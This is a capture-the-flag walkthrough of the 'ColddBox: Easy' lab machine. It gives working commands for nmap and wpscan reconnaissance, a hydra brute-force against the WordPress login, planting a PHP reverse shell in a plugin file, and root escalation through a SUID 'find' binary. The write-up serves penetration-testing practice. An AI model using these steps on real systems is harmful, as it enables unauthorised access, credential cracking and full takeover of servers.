ColddBox: Easy

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.70.76

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 80

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 80 -oN nmap 10.10.70.76

Enumeration

Lets visit the site

Looks like a well made page, while looking through the website I found a login page.

Also looking at the nmap scan, we know that WordPress 4.1.31 is running, also there is a Wordpress scanner called wpscan , lets use it to find more information.

wpscan --url http://10.10.70.76/ -e vp,t,u

Looking at the output, we find some interesting information

Lets use hydra to bruteforce and find atleast one password for one of the users. I saved the usernames in a file called users.

Exploitation

Lets now use hydra to crack the password

hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

And we get the password, lets login

We are logged in. For getting a reverse shell on the machine we have to add a reverse shell that you can find here. First lets go to the Plugins tab and then replace one of the plugins with the php reverse shell, also make sure to change the IP to yours.

After changing it, click update file and start a netcat listener.

Then navigate to the page.

http://10.10.58.100/wp-content/plugins/akismet/akismet.php

You should get a reverse shell. Lets stabilize the shell.

Privilege Escalation

Lets look for SUIDs that we can exploit.

find / -perm -u=s -type f 2>/dev/null

We have /usr/bin/find, lets go to GTFOBins and find the command to privilege escalate.

Lets use the second command

find . -exec /bin/sh -p \; -quit

We are now root.

Last updated